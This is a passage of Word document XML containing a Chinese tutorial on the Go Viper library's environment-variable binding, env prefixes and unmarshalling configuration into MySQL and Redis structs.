        <w:t xml:space="preserve">// 绑定环境变量 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23232828" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">viper.BindEnv("redis.port") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C83D75" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">viper.BindEnv("go.path", "GOPATH") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEA6A74" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E02996B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34C456F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">func main() { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B492B4D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">// 省略部分代码 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710F268D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">fmt.Println("go path: ", viper.Get("go.path")) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D46D98B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5214A01B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>BindEnv</w:t>
      </w:r>
      <w:r>
        <w:t>方法，如果只传入一个参数，则这个参数既表示键名，又表示环境变量名。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>如果传入两个参数，则第一个参数表示键名，第二个参数表示环境变量名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4F1A53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:t>还可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>viper.SetEnvPrefix</w:t>
      </w:r>
      <w:r>
        <w:t>方法设置环境变量前缀，这样一来，通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AutomaticEnv</w:t>
      </w:r>
      <w:r>
        <w:t>和一个参数的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BindEnv</w:t>
      </w:r>
      <w:r>
        <w:t>绑定的环境变量，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>在使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>Get</w:t>
      </w:r>
      <w:r>
        <w:t>的时候，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">viper </w:t>
      </w:r>
      <w:r>
        <w:t>会自动加上这个前缀再从环境变量中查找。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B1DF49" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:t>如果对应的环境变量不存在，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">viper </w:t>
      </w:r>
      <w:r>
        <w:t>会自动将键名全部转为大写再查找一次。所以，使用键名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>gopath</w:t>
      </w:r>
      <w:r>
        <w:t>也能读取环境变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>GOPATH</w:t>
      </w:r>
      <w:r>
        <w:t>的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCFB42F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E403F8C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01D2D1DA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FC95291" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39714B43" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A6117DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09DD60EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CDBAC81" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62758CE1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52AA8089" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7211D7B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="318D806A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前缀的设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8442F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1908E8A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SetEnvPrefix("spf") // will be uppercased automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D10A23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BindEnv("id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7E832F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="737B6AD4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>os.Setenv("SPF_ID", "13") // typically done outside of the app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BE2F2A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B244AAD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id := Get("id") // 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A51C8AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E8CA289" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Unmarshal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到结构体中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24444E1E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B75A18C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">package main import ( "fmt" "log" "github.com/spf13/viper" ) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC37119" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">type Config struct </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D67BA9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">{ AppName string </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D52E958" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">LogLevel string </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CEC4D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL MySQLConfig </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476226ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis RedisConfig </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7C1C34" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0352C306" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">type MySQLConfig struct { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19105F46" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">IP string </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2423CCB6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">Port int </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C712927" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">User string </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C447822" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">Password string </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C1AEAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">Database string </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36572CA4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49586AD7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60079D16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">type RedisConfig struct { IP string Port int } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F222CCF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1DD68A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">func main() { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBC6810" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
